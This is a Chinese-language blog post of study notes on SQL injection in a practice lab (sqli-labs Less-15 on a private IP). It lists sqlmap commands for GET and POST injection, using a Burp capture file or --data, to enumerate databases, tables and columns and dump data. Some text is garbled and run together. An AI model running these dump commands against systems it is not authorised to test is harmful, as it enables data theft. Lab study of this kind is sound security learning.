sql注入学习

📅 发布时间:2026/7/13 8:39:59 👁️ 浏览次数:
sql注入学习
我们传入 id or id or 11 实际上到了后端大概是这样子 id or 2、sqlmap实现注入2.1 GET方式首先使用指令查一下有哪些数据库接下来查一下可疑的cuber数据库中有哪些数据表再查一下数据表里有哪些行再查看一下pw这个字段的内容发现flag2.2 POST方式原文sqlmap使用教程(包含POST型注入方式)_sqlmap post-CSDN博客2.2.1 方法一抓包注入页面并保存文件,使用抓包文件进行注入(最准确)使用Burp抓包,然后保存抓取到的内容到文件中,使用sqlmap -r 加载抓包文件,让sqlmap使用抓包文件中的数据来测试SQL注入漏洞,这种方式是最准确的查看所有数据库 sqlmap -r /root/less-15.txt --batch -p uname --dbs -r 指定文件路径,从指定文件中读取HTTP请求 -p 指定参数名 不加p参数会自动检测注入点,也可以得到结果,指定注入参数名的话执行速度更快 查看当前数据库 sqlmap -r 保存的抓包后的txt文件 --batch -p POST的请求参数 --current-db 查表 sqlmap -r /root/less-15.txt --batch -p POST的请求参数 -D 数据库名 --tables 查字段 sqlmap -r /root/less-15.txt --batch -p POST的请求参数 -D 数据库名 -T 表名 --columns 查数据 sqlmap -r /root/less-15.txt --batch -p POST的请求参数 -D 数据库名 -T 表名 -C 字段名 --dump2.2.2 方法二使用--data参数指定HTTP POST请求的数据sqlmap -u 请求地址 --data POST的请求参数 sqlmap -u http://192.168.37.1/sqli/Less-15/ --data uname1 --dbs sqlmap -u http://192.168.37.1/sqli/Less-15/ --data uname1 -D security --tables sqlmap -u http://192.168.37.1/sqli/Less-15/ --data uname1 -D security -T users --columns